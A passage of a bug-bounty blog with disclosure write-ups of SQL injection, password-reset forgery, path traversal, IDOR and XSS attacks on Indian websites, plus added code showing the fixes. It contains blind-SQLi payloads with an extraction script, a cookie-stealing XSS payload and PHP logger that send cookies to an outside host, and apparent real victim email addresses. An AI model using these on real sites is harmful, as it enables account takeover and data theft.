Friday 15 June 2018

#BugBounty — "Database hacked of India's Popular Sports company": Bypassing Host Header to SQL injection to dumping Database — An unusual case of SQL injection

Hi Guys,

One more interesting blog, one more interesting vulnerability that I managed to find during my bug bounty hunt, this time in India's popular sports website. This is about how I was able to exploit the Host header to find a SQL injection, bypass a filtering rule using a sqlmap tamper script, and later dump the database. Let's see the complete scenario.

While checking the application for an OTP brute-force vulnerability, I ran Burp Intruder against the site and found that my IP got blocked. From the error message I could figure out that the application was hosted on AWS. I also found the "X-Amz-Cf-Id" header in the HTTP response (CloudFront adds this request-ID header to the request it forwards to the origin and to the response it returns to the viewer):

Cloudfront header

and this was enough for me to conclude that the application is running on AWS. Before directly jumping to check for some critical vulnerability, I always start from low-hanging fruit (just to increase the list of vulnerabilities :) ), so I started with a Host header attack. Changing the Host header value itself didn't work. Since the application is on AWS, it is very likely sitting behind a load balancer (ELB) or CloudFront, and an application behind a proxy commonly trusts the X-Forwarded-Host header as the original host, so I tried the Host header attack using X-Forwarded-Host as below:
Added X-Forwarded-Host header


I added the X-Forwarded-Host header and set its value to www.google.com, and I got a 302 redirect to google.com. But when I set the value to www.evil.com, I got the response below:
HTTP 403 Forbidden


HTTP 403 Forbidden, and now something struck my mind. It was clear that the backend must be whitelisting host values (it allowed google.com but denied evil.com). There are two possibilities: either a script checks the value against an array/list of allowed values, or the allowed values are stored in the database and there is a database lookup. To check for the second case, I tried some SQL payloads in the value of X-Forwarded-Host, and this is what I got:


Time based SQL Injection in X-Forwarded-Host header

As you can see in the screenshot above, I sent a SQL payload with sleep(10) and the HTTP response took 9.4 seconds. Yes, an unusual case of SQL injection, in the X-Forwarded-Host header :). The next task was to extract some DB content. As usual, I ran sqlmap against the vulnerable header and found that the connection was being refused, so I added a delay to throttle the HTTP requests and increased the connection timeout (--delay=DELAY --timeout=TIMEOUT) and waited for a while, but I still faced the same issue. Perhaps some characters were blacklisted. To quickly check this, I entered "<script>alert(1)</script>" in the X-Forwarded-Host header and got a response with HTTP status 400 Bad Request.

The thing was pretty clear: the < and > characters (and so script tags) were blacklisted. sqlmap provides a tamper script, between.py, that rewrites comparison operators (for example, > becomes NOT BETWEEN 0 AND #) so the payloads no longer contain those symbols. I included it in the sqlmap command (--tamper=between), ran it, and after some time I ended up with the complete database of the enterprise, containing (at a sample level) user credentials, email IDs and lots more data (for proof of concept):

Database Data


And this is how I found an unusual case of SQL injection, by turning a Host header attack via X-Forwarded-Host into a database dump, in India's popular sports company.
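The allow-list lookup inferred above, as an added example that is not the site's code: SQLite stands in for the real database, the two permitted hosts and the 400-on-angle-brackets rule are constructed stand-ins, and www.sportssite.example is a placeholder. It shows why a database-backed allow-list built by string concatenation turns the header into an injection point (a payload makes www.evil.com "allowed"), why the rule that blocks < and > stops a payload using > but not its NOT BETWEEN rewrite, and why binding the header as a parameter closes both.

```python
import sqlite3

# Constructed allow-list, standing in for the backend's table of permitted hosts.
ALLOWED_HOSTS = ["www.google.com", "www.sportssite.example"]


def _connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE allowed_hosts (host TEXT NOT NULL)")
    conn.executemany("INSERT INTO allowed_hosts VALUES (?)", [(h,) for h in ALLOWED_HOSTS])
    return conn


def rule_blocks(value: str) -> bool:
    """Stand-in for the filtering rule that answered 400 Bad Request on '<' and '>'."""
    return "<" in value or ">" in value


def host_allowed_vulnerable(xfh: str) -> bool:
    """Allow-list lookup built by string concatenation: the header value becomes SQL."""
    conn = _connect()
    sql = "SELECT 1 FROM allowed_hosts WHERE host = '%s'" % xfh
    return conn.execute(sql).fetchone() is not None


def host_allowed_fixed(xfh: str) -> bool:
    """Same lookup with a bound parameter: the header is only ever compared as data."""
    conn = _connect()
    sql = "SELECT 1 FROM allowed_hosts WHERE host = ?"
    return conn.execute(sql, (xfh,)).fetchone() is not None


def origin_response(xfh: str, lookup=host_allowed_vulnerable) -> int:
    """HTTP status the origin would answer for a given X-Forwarded-Host value:
    400 if the rule fires, 302 (redirect to that host) if allowed, 403 otherwise."""
    if rule_blocks(xfh):
        return 400
    try:
        return 302 if lookup(xfh) else 403
    except sqlite3.Error:
        return 500


if __name__ == "__main__":
    for value in ("www.google.com",
                  "www.evil.com",
                  "www.evil.com' OR '1'='1",
                  "www.evil.com' OR 1>0 -- ",
                  "www.evil.com' OR 1 NOT BETWEEN 2 AND 3 -- "):
        print(repr(value), origin_response(value), origin_response(value, host_allowed_fixed))
```

With the concatenated query, `www.evil.com' OR '1'='1` is redirected to like a whitelisted host, the `>` variant is stopped by the rule, and the NOT BETWEEN variant (what between.py emits) gets through again; with the bound parameter every one of them is a plain 403.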

Report details-

03-May-2018 — Bug reported to the concerned company.

03-May-2018 — Bug was marked fixed.

03-May-2018 — Re-tested and confirmed the fix

05-May-2018 — Rewarded by the company.

Thanks for reading!

~Logicbomb ( https://twitter.com/logicbomb_1 )

Sunday 23 October 2016

User Account Takeover via Reset Password Functionality

Hey Guys,

One more interesting blog explaining an interesting vulnerability that I have found recently in one of the Mobile Wallet Companies of India.

To log in to any online website we need a username, which can be the user's registered mail ID, and the password he has set for it; if he doesn't remember his password, there is a Reset Password feature to help. While researching vulnerabilities around this feature, I found a logic flaw by which I was able to reset any user's password and log in with it to take over his complete account.

Let's now enter into the explanation-

1. When I clicked on the Reset password functionality for the account "testaccount09@gmail.com", I received a mail saying "To reset the password, please click on the below link" and the link was something like:
 http://www._________.com/account/resetpassword/?id=296417&token=dGVzdGFjY291bnQwOUBnbWFpbC5jb20=&vit=MjAxNi8xMC8yNQ==

2. Here 'id' is the identification number associated with the user account, 'token' is the base64-encoded registered mail ID of the user (here it decodes to "testaccount09@gmail.com") and 'vit' is a base64-encoded timestamp, which in this case decodes to "2016/10/25".
        

3. Researching more, I found that the timestamp parameter is the expiry date of the reset password link, here 2 days from the time the user clicked on reset password.

4. Now comes the step of compromising a user account. I replaced the mail ID in the reset password link with the victim's mail ID, base64-encoded, and kept the timestamp value 2 days ahead of the current date.

          Victim mail id - varun09811@gmail.com
          Base64 encoded value (Parameter = token) - dmFydW4wOTgxMUBnbWFpbC5jb20=
          Timestamp value (Parameter = vit) - MjAxNi8xMC8yNQ==
     

5. The tricky part is finding the "id" associated with that particular mail ID. Since it is a 6-digit number, I brute-forced it with a Python script, and after a while I found the right id associated with the victim mail ID, which happened to be id=254346 (yes, this is time consuming).

6. So the tampered URL is:
http://www._________.com/account/resetpassword/?id=254346&token=dmFydW4wOTgxMUBnbWFpbC5jb20=&vit=MjAxNi8xMC8yNQ==

I loaded the link in the browser, set a new password, and was successfully able to log in to his account. I had complete access to it: I could use his wallet money, change the registered mobile number and everything else.
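The reset link format described in steps 1 to 6, as an added example that is not the wallet company's code: it decodes the three parameters, forges a link for any mail ID and user id the way the post does, and contrasts that with a reset token that cannot be forged. The host www.example.com is a placeholder for the redacted one, and the hardened form (a random single-use token, stored server-side only as a hash and bound to the user id) is a standard design, not something the post says the company adopted.

```python
import base64
import hashlib
import secrets
from datetime import date, timedelta
from urllib.parse import parse_qs, urlencode, urlsplit

# Placeholder for the redacted host.
BASE = "http://www.example.com/account/resetpassword/"


def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


def unb64(s: str) -> str:
    return base64.b64decode(s.encode()).decode()


def parse_reset_link(url: str) -> dict:
    """Decode id, token (mail ID) and vit (expiry date) exactly as the post describes them."""
    q = parse_qs(urlsplit(url).query)
    return {"id": int(q["id"][0]), "email": unb64(q["token"][0]), "expires": unb64(q["vit"][0])}


def forge_reset_link(user_id: int, victim_email: str, today: date) -> str:
    """Step 4 and 6: nothing in the link is secret or signed, so anyone can build one.
    The user id is the only unknown, and a 6-digit id is cheap to brute-force."""
    params = {
        "id": user_id,
        "token": b64(victim_email),
        "vit": b64((today + timedelta(days=2)).strftime("%Y/%m/%d")),
    }
    return BASE + "?" + urlencode(params)


# Hardened design (assumed, not the company's): token hash -> (user_id, expiry), server-side only.
RESET_STORE = {}


def issue_reset(user_id: int, today: date) -> str:
    token = secrets.token_urlsafe(32)           # 256 bits of randomness: not guessable
    digest = hashlib.sha256(token.encode()).hexdigest()
    RESET_STORE[digest] = (user_id, today + timedelta(days=2))
    return BASE + "?" + urlencode({"id": user_id, "token": token})


def redeem_reset(url: str, today: date):
    """Return the user id the token was issued for, or None. The token is burned on any attempt."""
    q = parse_qs(urlsplit(url).query)
    digest = hashlib.sha256(q["token"][0].encode()).hexdigest()
    entry = RESET_STORE.pop(digest, None)
    if entry is None:
        return None
    user_id, expiry = entry
    if int(q["id"][0]) != user_id or today > expiry:
        return None
    return user_id


if __name__ == "__main__":
    print(parse_reset_link(BASE + "?id=296417&token=dGVzdGFjY291bnQwOUBnbWFpbC5jb20=&vit=MjAxNi8xMC8yNQ=="))
    print(forge_reset_link(254346, "varun09811@gmail.com", date(2016, 10, 23)))
```

The base64 "token" carries no secret: anyone who knows a mail ID can produce a valid-looking link, and the expiry is set by the attacker too. With a random token whose hash is stored next to the user id, a forged link fails, a link used twice fails, and an expired link fails, regardless of what the attacker knows about the account.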

I reported this vulnerability to the concerned enterprise, and they were quick to patch it within 2 days.I thank the company for the small token of appreciation :) 

That's all about it! 
Do share your feedback.

Thanks
~logicbomb

Tuesday 6 September 2016

Database Compromised via Manual SQL Injection

Hi Guys,

Recently while hunting for bug bounty, I was able to crack a website database using one of the most common vulnerabilities and yet the most severe - SQL Injection. I found this highly critical vulnerability in India's biggest "Online Job and test portal".

Let's have a quick review about SQL Injection-

Websites often use databases at the backend to store and manage large amounts of information. The de-facto standard language for querying databases is SQL. Web applications often take user input (taken out of the HTTP request) and incorporate it in an SQL query, which is then sent to the backend database. The query results are then processed by the application and sometimes displayed to the user.

By exploiting this vulnerability, an attacker can directly pass malicious queries and inputs to the database and interpret the responses from the database. It allows an attacker to read, write, modify or delete information stored within the database along with sometimes gaining system level access to the underlying operating system.

In the instances below, the affected parameters were passing user input directly to the back-end database without proper validation. Because of this, it is possible to insert malicious data into these fields to not only cause errors but also to gain complete access to the database. On successful exploitation of the vulnerability, an attacker would have access to Read, Write and Modify any data stored within the database.

Now lets jump into its POC-

I was able to detect the SQL injection in one of the parameters via a blind SQL payload:
vulnerable_parameter=' and sleep(2)

Note: sleep() was used because the backend database was MySQL.

I found that as I changed the value passed to sleep(), the HTTP response took that long, i.e. the page loaded only after that delay. With sleep(2) the response took 2 seconds, and when I changed it to sleep(10) it took approximately 10 seconds. This confirmed for me that SQL injection exists and that the parameter is vulnerable to blind (time-based) SQL injection. The next step was to find the database details along with the database tables.
To find the database username, I created the following payload:

(select * from(select(if(substring(user(),1,3)='pea',sleep(5),'b')))a)-- -

This checks whether the first three characters of the database username are 'pea': if they are, sleep(5) runs and the HTTP response is delayed by about 5 seconds, the same time-based technique as above. By changing the offset and the guessed characters, I moved one character at a time to recover the complete username.

To find table names, the payload used was:
(select * from(select(if(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='a',sleep(5),'b')))a)-- -

Like the payload above, this checks the first table name of the current database one character at a time (change the offset in substring() and the guessed character, and change the limit offset to move on to the next table); a 5 second response means the guess was right. Once you have a table name, the next step is to find its column names.

Suppose the table name we get is "users".

(select * from(select(if(substring((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1)='u',sleep(5),'b')))a)-- -

This tests whether the first column name of the "users" table in the current database starts with 'u'. If it does, the page loads after 5 seconds.
And now comes the last thing: dumping the table contents.

Here "column_name" is replaced by a column fetched by the payloads above.

(select * from(select(if(substring((select column_name from users limit 0,1),1,1)='a',sleep(5),'b')))a)-- -


Further, this can be automated with a simple Python script.
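Such an automation, as an added example and not the author's script: it runs the character-by-character extraction loop that the payloads above perform by hand, against a constructed vulnerable endpoint. SQLite stands in for MySQL (with a Python sleep() registered as a SQL function, and CASE WHEN playing the role of MySQL's if()), the users table and its single row are made up, and the "x' UNION SELECT ..." shape is one way to get the conditional evaluated regardless of whether the original query matches a row. The extraction logic itself (guess a character at an offset, treat a slow response as "true", advance) is the general technique the post describes.

```python
import sqlite3
import string
import time

DELAY = 0.1            # seconds the injected sleep() adds on a correct guess
THRESHOLD = DELAY / 2  # a response slower than this is read as "true"


def make_vulnerable_app():
    """Constructed stand-in for the vulnerable endpoint (SQLite in place of MySQL)."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no sleep(); register one so the time-based oracle behaves like MySQL's.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('peabody', 's3cret')")  # constructed row

    def lookup(value: str):
        # Deliberately vulnerable: the parameter is concatenated into the query.
        sql = "SELECT username FROM users WHERE username = '%s'" % value
        return conn.execute(sql).fetchall()

    return lookup


def response_time(lookup, value: str) -> float:
    """The only signal a blind, time-based injection gives: how long the request took."""
    t0 = time.perf_counter()
    try:
        lookup(value)
    except sqlite3.Error:
        pass  # a broken query fails fast, which reads as "false"
    return time.perf_counter() - t0


def guess_payload(expr: str, pos: int, ch: str, delay: float = DELAY) -> str:
    """Delay only if character `pos` (1-based) of the value of `expr` equals `ch`.

    MySQL form from the post: if(substring((expr),pos,1)='c', sleep(5), 'b').
    SQLite has no if(), so CASE WHEN plays that role.
    """
    return (
        f"x' UNION SELECT CASE WHEN substr(({expr}), {pos}, 1) = '{ch}' "
        f"THEN sleep({delay}) ELSE 0 END -- -"
    )


def extract(lookup, expr: str,
            charset: str = string.ascii_lowercase + string.digits + "_@.",
            max_len: int = 32) -> str:
    """Recover the string value of `expr` one character at a time."""
    out = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in charset:
            if response_time(lookup, guess_payload(expr, pos, ch)) >= THRESHOLD:
                hit = ch
                break
        if hit is None:     # no candidate matched: past the end of the string
            break
        out += hit
    return out


if __name__ == "__main__":
    app = make_vulnerable_app()
    print(extract(app, "SELECT username FROM users LIMIT 1"))
    print(extract(app, "SELECT password FROM users LIMIT 1"))
```

Against a real target, `lookup` becomes a function that sends the HTTP request with the payload in the vulnerable parameter, the threshold has to sit well above network jitter (the post's 5 second sleep is a comfortable margin), and the `limit 0,1` offset in `expr` is what moves the extraction to the next table, column or row.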

I reported this vulnerability and it was patched by the concerned enterprise within a week.
That's all about this hack, one of the most common and most severe kinds of vulnerability.

Do share your feedback and queries. 
Thanks.







Thursday 7 July 2016

Local File Inclusion Attack

Hi Guys,

Back with one more vulnerability technique, the "Local File Inclusion" attack. With this attack I was able to get the complete source code of the application and the API keys of the affected enterprise.

I have found this vulnerability in India's largest online health platform website.

Let's have a look at the vulnerability-


A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files on the web server, or to execute malicious files on it. It occurs when user input contains the path of the file that has to be included. When such input is not properly sanitized, the attacker can supply other file names and access unauthorized files, or use directory traversal sequences to retrieve sensitive files from other directories. Local File Inclusion (LFI) allows an attacker to read and sometimes execute files on the victim machine. This can be very dangerous: if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information, and if the attacker is able to place code on the web server through other means, they may be able to execute arbitrary commands.



Through this vulnerability I was able to read all the files, including the application source code and sensitive files like web.config, where I got the API keys of the mail server, SMS service, payment gateway etc. I was further able to use the mail server key to send mail from the enterprise mail server, and even to send SMS using the SMS key.

The technique that was used to find this vulnerability is called Path Traversal Attack.




I found this vulnerability in the URL and the parameter shown in the screenshot above.

The response of the above URL HTTP request is as below-





From this I could see that Microsoft IIS was the web server in use, so I tried to open the Windows WIN.INI file via path traversal.


And I got the following response-





This is the content of WIN.INI file. So by this I was confirmed that Local File Inclusion vulnerability exist.


The “../” used in the example above represent a directory traversal. The number of “../” depend on the configuration and location of the target web server on the victim machine. Some experimentation may be required.
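The traversal described above and the check that stops it, as an added example that is not the health platform's code: a constructed web root with one legitimate template, a constructed "secret" file two directories up in place of the real web.config, a file-serving function that joins the user-supplied name onto a base directory with no check, and its hardened form. The hardened version is the standard fix (resolve the path first, then require it to stay under the intended directory), assumed here rather than taken from the post.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Constructed layout: <root>/wwwroot/templates/header.html is meant to be served,
# <root>/secret.ini stands in for the web.config that sat outside the intended directory.
ROOT = Path(tempfile.mkdtemp())
TEMPLATES = ROOT / "wwwroot" / "templates"
TEMPLATES.mkdir(parents=True)
(TEMPLATES / "header.html").write_text("<h1>site</h1>")
(ROOT / "secret.ini").write_text("[keys]\napi=constructed-value\n")


def read_vulnerable(name: str) -> str:
    """Joins the request parameter onto the base directory with no check at all.
    '../' walks up; an absolute path makes os.path.join discard the base entirely."""
    path = os.path.join(TEMPLATES, unquote(name))
    with open(path) as f:
        return f.read()


def read_fixed(name: str) -> str:
    """Resolve first (collapsing every '..' and symlink), then require the result
    to be the base directory or something beneath it."""
    base = TEMPLATES.resolve()
    target = (base / unquote(name)).resolve()
    if target != base and base not in target.parents:
        raise PermissionError(f"path escapes template directory: {name!r}")
    with open(target) as f:
        return f.read()


def fixed_rejects(name: str) -> bool:
    """True when the hardened reader refuses `name` as a traversal."""
    try:
        read_fixed(name)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print(read_vulnerable("header.html"))
    print(read_vulnerable("../../secret.ini"))          # escapes the web root
    print(read_vulnerable("..%2f..%2fsecret.ini"))      # same, URL-encoded slashes
    print(fixed_rejects("../../secret.ini"), fixed_rejects(str(ROOT / "secret.ini")))
```

Note that the check compares resolved paths rather than looking for the substring "../": a blacklist misses encoded separators and absolute paths, both of which the vulnerable reader happily follows here.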

Now I tried escalating this vulnerability.

As expected, I was able to get the complete source code of the login.ashx page, which is itself a high-risk finding.

                             

A source code disclosure vulnerability allows an attacker to view or download the source code files of the web application from the web server. These files can reveal sensitive information about specific functionality of the website, how different pages react to the parameter values given to them, and so on. An attacker can use this information to carry out targeted attacks on the website, which may lead to its compromise.
Because the source files are effectively publicly accessible, an attacker may also download them and carry out intellectual property theft.
In addition, these files may contain sensitive details about the inner workings of the website and disclose additional vulnerabilities.




Response of above request-



Similarly , I was able to find the source code of complete application.

Now the critical aspect of this, below is the webconfig file –



Check the response-









As you can see, the server credentials, the mail server API key, the SMS service API key and the payment gateway API key are all accessible.
With some more research, I was able to use the keys to send mails, send SMS etc.


Risk-

Through the source code disclosure, I was able to get the complete source code of the application.
These files reveal sensitive information about the specific functionality of the application. For example, I could read the logic behind the encryption used for login and use it for a user account hijack.
The local file inclusion vulnerability gave me access to all the API keys used by the application. I was able to use the mail server API key to send mails on behalf of the company, and the SMS key to send SMS. The payment gateway API key could be used to bypass the payment gateway completely and buy products at a much lower price.


I reported this vulnerability to the concerned company on 19th June and it was soon patched after that.

Any feedback,suggestion would be highly appreciated :)

Thanks

~logicbomb

Thursday 16 June 2016

Customer Information Disclosure via IDOR

Hi Guys,
Recently, while researching for bug bounty, I found a very critical IDOR vulnerability (explained in the previous blog post) in one of the Indian shopping websites (again, I can't disclose the name for obvious reasons).

Some of the things I was able to do by exploiting this vulnerability:

  1. Full Customer Information Disclosure including complete name, Mail Id, phone number , Address.
  2. Delete address from any user account
  3. Add address details to any user account.

I found this vulnerability in one shopping website of India. I had access to all their customer data until the concerned company patched it after I reported it to them.

Now lets see the steps-


1-  Like every shopping website, there is a functionality to choose the delivery address where the customer wants his product shipped. When I clicked on the address where I wanted my product shipped and captured the HTTP request, I found that an address_id was tagged to my address.



The response of the above request contains my delivery address- Full Name, Mobile Number, Mail id, and address.









2-  As can be seen in the screenshot above, these are my details. Now I tried changing the address_id to some other value, like "1985170",



and checked the response.


3-  Since there was no access control check, I was able to see another user's address details. By brute-forcing this 7-digit number, I could dump the details of all the company's customers.

4-  Similarly, there is a functionality to delete an address. I clicked on remove address and captured the request.



5-  Now, by brute-forcing the address_id parameter, I was able to delete the address of any user from his account.
Here I used the address id I had got above.



and, as expected, I got 200 OK.




Now let's check whether the address has been deleted from his account or not, using the same method by which I extracted his information.




and again, as expected, the address associated with that particular id is deleted.




6-  Similarly, I could add an address to any customer account.
I clicked on edit address and then save; the captured raw request is below:



7-  Now, by brute-forcing the address id and filling in the details, I was able to add my address to any user account just by supplying the address id.
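The address endpoints of steps 1 to 7 as an added example, not the shopping site's code: a constructed SQLite address book with two customers, lookups and deletes keyed on address_id alone (which is all the brute-force loop needs), and the same operations with the object-level check that the site lacked. The fix shown (every query carries the logged-in user's id as well as the object id, and new rows take their owner from the session) is the standard one and is assumed, not taken from the post.

```python
import sqlite3


def make_store() -> sqlite3.Connection:
    """Constructed address book: two customers (user_id 100 = me, 200 = someone else)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE addresses (address_id INTEGER PRIMARY KEY, user_id INTEGER NOT NULL, "
        "name TEXT, phone TEXT, email TEXT, address TEXT)"
    )
    conn.executemany("INSERT INTO addresses VALUES (?, ?, ?, ?, ?, ?)", [
        (1985169, 100, "Me", "9999999999", "me@example.com", "1 Test Road"),
        (1985170, 200, "Other Customer", "8888888888", "other@example.com", "2 Private Lane"),
    ])
    return conn


def get_address_vulnerable(conn, address_id: int):
    """Steps 1-3: keyed on address_id alone, so any id anyone supplies is answered."""
    return conn.execute(
        "SELECT name, phone, email, address FROM addresses WHERE address_id = ?",
        (address_id,),
    ).fetchone()


def delete_address_vulnerable(conn, address_id: int) -> int:
    """Steps 4-5: same for deletion. Returns the number of rows removed."""
    return conn.execute("DELETE FROM addresses WHERE address_id = ?", (address_id,)).rowcount


def enumerate_vulnerable(conn, start: int, stop: int) -> list:
    """The brute-force loop of step 3 over a range of 7-digit ids."""
    found = []
    for address_id in range(start, stop):
        row = get_address_vulnerable(conn, address_id)
        if row is not None:
            found.append((address_id, row))
    return found


def get_address_fixed(conn, session_user_id: int, address_id: int):
    """Object-level check: the row must belong to the logged-in user. A foreign id and
    an unknown id both come back as None, so the response does not reveal which it was."""
    return conn.execute(
        "SELECT name, phone, email, address FROM addresses WHERE address_id = ? AND user_id = ?",
        (address_id, session_user_id),
    ).fetchone()


def delete_address_fixed(conn, session_user_id: int, address_id: int) -> int:
    return conn.execute(
        "DELETE FROM addresses WHERE address_id = ? AND user_id = ?",
        (address_id, session_user_id),
    ).rowcount


def add_address_fixed(conn, session_user_id: int, name, phone, email, address) -> int:
    """Steps 6-7 hardened: owner and id are assigned by the server, never read from the request."""
    cur = conn.execute(
        "INSERT INTO addresses (user_id, name, phone, email, address) VALUES (?, ?, ?, ?, ?)",
        (session_user_id, name, phone, email, address),
    )
    return cur.lastrowid


if __name__ == "__main__":
    store = make_store()
    print(enumerate_vulnerable(store, 1985160, 1985180))   # both customers' rows
    print(get_address_fixed(store, 100, 1985170))          # None: not my address
    print(delete_address_fixed(store, 100, 1985170))       # 0 rows: cannot delete it either
```

A 200 OK on the delete in step 5 is the giveaway: the server never asked whose address 1985170 was. With `user_id` in every WHERE clause the same request returns 0 rows and the other customer's data stays put.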

So this is all about this hack- A vulnerability directly affecting company reputation and customer trust.

I reported this vulnerability on 23rd May and it got patched soon after 1 week.


Suggestions, feedback, queries all are welcome :)
-logicbomb


Sunday 15 May 2016

User Account Hijack via IDOR

Hi All,

One more day of hack!

While researching for vulnerabilities, I have found a very critical vulnerability of Insecure Direct Object Reference(IDOR) in one of the Hotel Booking websites by which I was able to hijack any user account. 

What is IDOR?
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying value of a parameter used to directly point to an object. This is caused by the fact that the application takes input from the user and without performing any authorization check allow the user the access to the object.
This is occupying the fourth spot in Open Web Application Security Project(OWASP) Top 10 list of the most critical web application security risks since 2007.

I found this vulnerability in one hotel booking company of India. I was able to completely compromise any user account, provided I had the user's mail ID.


Below are the steps- 

1. I created my account , and went to my profile section where I found different functionalities like  "Wallet Money" , "My bookings" just like every travel booking websites have.

2. I captured the request made by clicking on the "Wallet Money" functionality and found that there was a parameter containing the mail ID, i.e. emailId.



The response to the request is the credit balance that the user has in his wallet.



3- Seeing this, I changed the mail ID to some other mail ID (obviously one with an account on this website) and found that I could check the wallet money of the user associated with that mail ID.

I changed the mail id to victim mail address and I got the below response-



         







4- Similarly, the "My bookings" functionality was vulnerable to IDOR: I could see the bookings made by a user by modifying the mail ID. Then I went further and tried to hijack a user account using the "New Password" functionality.

From the above two scenarios I found that the user's mail ID was not mapped to any authentication token, and there was no authorization check of whether the user had access to the particular object or not.

5- I checked the "My Profile" section, where I could change the current password, and captured the raw request.
            
   










6- Now, as you can see in the request, there are parameters like FirstName, LastName, Email, Password, NewEmail.

I changed the "Email" parameter to the victim's mail ID, i.e. moneyjain030193@gmail.com, kept a password of my choice, i.e. 123456, and, as I was expecting, got 200 OK.























And, with no surprise, I was able to log in successfully with the victim's ID and the password I had chosen for him.
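The password change of steps 5 and 6 as an added example, not the booking site's code: a constructed account store, a handler that updates whichever account the Email field of the body names (the behaviour the post describes), and a hardened handler that takes the subject from the session and re-verifies the current password before changing it. The same rule, subject from the session rather than from emailId in the request, is what closes the wallet and booking lookups of steps 2 to 4; the hardened form is assumed, not taken from the post.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass

ITERATIONS = 20_000   # kept low for the example; production uses far more


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


@dataclass
class Account:
    email: str
    salt: bytes
    pw_hash: bytes


ACCOUNTS = {}   # email -> Account (constructed, in-memory)


def register(email: str, password: str) -> None:
    salt = os.urandom(16)
    ACCOUNTS[email] = Account(email, salt, _hash(password, salt))


def login(email: str, password: str) -> bool:
    acct = ACCOUNTS.get(email)
    return acct is not None and hmac.compare_digest(acct.pw_hash, _hash(password, acct.salt))


def change_password_vulnerable(form: dict) -> int:
    """Step 6 as observed: whichever account the body's Email names gets the new Password.
    The session the request arrived on plays no part at all."""
    acct = ACCOUNTS.get(form["Email"])
    if acct is None:
        return 404
    acct.pw_hash = _hash(form["Password"], acct.salt)
    return 200


def change_password_fixed(session_email: str, form: dict) -> int:
    """The subject is the logged-in user, whatever Email the body carries, and the
    current password must be presented again before it can be replaced."""
    acct = ACCOUNTS.get(session_email)
    if acct is None or not login(session_email, form.get("CurrentPassword", "")):
        return 403
    acct.pw_hash = _hash(form["Password"], acct.salt)
    return 200


if __name__ == "__main__":
    register("attacker@example.com", "attackerpw")
    register("victim@example.com", "victimpw")
    print(change_password_vulnerable({"Email": "victim@example.com", "Password": "123456"}))
    print(login("victim@example.com", "123456"))   # victim's account now opens with 123456
    print(change_password_fixed("attacker@example.com",
                                {"Email": "victim@example.com", "Password": "x",
                                 "CurrentPassword": "attackerpw"}))
    print(login("victim@example.com", "x"), login("attacker@example.com", "x"))
```

In the hardened handler the attacker's request still returns 200, but the password that changed is the attacker's own: the Email field is simply not consulted.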


That's all about this IDOR vulnerability ,simple yet critical.

Suggestions and feedback are welcome :)

Sunday 20 December 2015

User Account Hijack via XSS

Hi All,

This blog is about How I managed to hijack user account by exploiting XSS vulnerability in one of the biggest online food company of India. (Can't disclose the name for obvious reason)


Cross site scripting (XSS) is one of the most rampant and yet most underestimated web application vulnerabilities. Theft of cookies, personal data, authentication credentials and browser history are probably the less dangerous consequences of XSS attacks. Recently, while working on web application vulnerabilities, I found an XSS vulnerability in one of the most popular online food ordering websites of India, and when I paired it with some social engineering I was able to take over user accounts.


So here are the steps-


1- First I discovered the XSS vulnerability in the website.

I couldn't show the PoC for it as it got patched.

The basic motive was to get the user's cookies, so I did the following two steps:



  • Created a payload which extracts the user's cookies from the browser.
Payload- "><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie">
  • Developed a PHP script to capture the user's cookies (the version below appends them to a log file on my server).
<?php
// Appends the cookie value sent by the payload to log.txt on the attacker's host.
$cookie = isset($_GET["cookie"]) ? $_GET["cookie"] : "";
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie . "\n");
fclose($steal);
?>


2- So the vulnerable link looked like:

https://thevulnerablesite.com/asian?vulnerableparameter="><img src='aa' onerror="this.src='http://mywebsite.com/anyfile.php?cookie='+document.cookie">


The next step is to lure the user into clicking on it.


Note: the user must be logged in to the vulnerable website, i.e. the session cookies must be present in the user's browser.

As the user clicks on the malicious link sent by the attacker (here I was the attacker), I got the user's cookies in my mailbox.


3- Open your browser (I prefer Mozilla Firefox) and inject the captured cookies using a cookie editor such as Cookie Manager.






Once that is done, reload the page and you are successfully logged in as the victim user, with full access to his account.






Through this XSS attack I gained full access to the victim's account: I could place orders, cancel them, change the mobile number and even make payments from his account.
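The reflection that makes the payload above fire, and the two controls that would have stopped the account takeover, as an added example that is not the food company's code: the `<input ... value="...">` template is a hypothetical reflection point (the real one is not shown in the post), the cookie name "session" is made up, and the payload string is the one from step 1. It shows the raw reflection versus an HTML-escaped one, and why a session cookie set with HttpOnly never appears in document.cookie even when the script does run.

```python
import html

# The payload from step 1 (closing quote and tag, then an <img> whose onerror exfiltrates cookies).
PAYLOAD = ("\"><img src='aa' onerror=\"this.src='http://mywebsite.com/anyfile.php?cookie='"
           "+document.cookie\">")

# Hypothetical reflection point: a search box that echoes the query parameter.
TEMPLATE = '<input type="text" name="q" value="%s">'


def render_vulnerable(value: str) -> str:
    """Reflects the parameter verbatim: the payload's leading "> breaks out of the attribute."""
    return TEMPLATE % value


def render_fixed(value: str) -> str:
    """Escapes &, <, >, " and ' so the parameter can only ever be attribute text."""
    return TEMPLATE % html.escape(value, quote=True)


def session_cookie_vulnerable(session_id: str) -> str:
    """Set-Cookie as a site that forgets the flags would send it."""
    return "session=%s; Path=/" % session_id


def session_cookie_fixed(session_id: str) -> str:
    """HttpOnly keeps it out of document.cookie; Secure and SameSite limit where it travels."""
    return "session=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % session_id


def script_accessible_cookies(set_cookie_headers) -> list:
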